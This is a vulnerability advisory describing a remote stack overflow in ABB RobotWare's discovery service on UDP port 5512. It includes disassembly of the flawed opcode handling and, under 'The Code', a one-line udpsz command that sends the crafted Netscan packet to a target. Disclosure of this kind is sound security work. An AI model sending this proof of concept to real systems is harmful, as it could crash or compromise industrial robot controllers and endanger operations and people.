#######################################################################

                             Luigi Auriemma

Application:  ABB RobotWare
              the vulnerable service is available in RoboStudio and
              WebWare:
                http://www.abb.com/product/seitp327/12e18c81002601cac1256f2b003b638e.aspx
              the service doesn't need a license to run so can be
              tested without problems, remember to enable the "Data
              Collector" option during the installation of WebWare
Versions:     <= 5.12.2040.02
Platforms:    Windows
Bug:          stack overflow
Exploitation: remote, versus server
Date:         probably found 10 Feb 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


???


#######################################################################

======
2) Bug
======


ABB Industrial Robot Discovery Server (RobNetScanHost.exe) is a service
that is started manually or automatically if some ABB programs are
launched (for example "Device Configuration") and remains up.
This is what happens in WebWare so it's possible that in the other ABB
products that use it the service is started automatically at boot or
maybe the situation is the same.

The UDP port 5512 accepts the incoming "Netscan" packets and there is a
stack overflow during the handling of the opcodes 0xa (limited by the
canary) and 0xe (successfully bypasses the canary):

  10002875  |.  48            |DEC EAX                          ; Switch (cases 1..11)
  10002876  |.  83F8 10       |CMP EAX,10
  10002879  |.  0F87 AE000000 |JA 1000292D
  1000287F  |.  FF2485 5E2900>|JMP DWORD PTR DS:[EAX*4+1000295E]
  ...skip...
  100028E3  |>  8B45 84       |MOV EAX,DWORD PTR SS:[EBP-7C]    ; Case A of switch 10002875
  100028E6  |.  57            |PUSH EDI
  100028E7  |.  FF75 80       |PUSH DWORD PTR SS:[EBP-80]
  100028EA  |.  C700 01000000 |MOV DWORD PTR DS:[EAX],1
  100028F0  |>  E8 BBEB0000   |CALL 100114B0                    ; stack overflow
  100028F5  |.  59            |POP ECX
  100028F6  |.  EB 34         |JMP SHORT 1000292C
  100028F8  |>  57            |PUSH EDI                         ; Case C of switch 10002875
  100028F9  |.  E8 AAEC0000   |CALL 100115A8
  100028FE  |.  48            |DEC EAX
  100028FF  |.  F7D8          |NEG EAX
  10002901  |.  1BC0          |SBB EAX,EAX
  10002903  |.  40            |INC EAX
  10002904  |.  40            |INC EAX
  10002905  |.  8946 40       |MOV DWORD PTR DS:[ESI+40],EAX
  10002908  |.  EB 22         |JMP SHORT 1000292C
  1000290A  |>  837D 90 00    |CMP DWORD PTR SS:[EBP-70],0      ; Case E of switch 10002875
  1000290E  |.  74 1D         |JE SHORT 1000292D
  10002910  |.  57            |PUSH EDI
  10002911  |.  FF75 90       |PUSH DWORD PTR SS:[EBP-70]
  10002914  |.^ EB DA         |JMP SHORT 100028F0


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

  udpsz -c "Netscan;3e8;0;e:" -b a SERVER 5512 1000


#######################################################################

======
4) Fix
======


http://www.zerodayinitiative.com/advisories/ZDI-12-033/


#######################################################################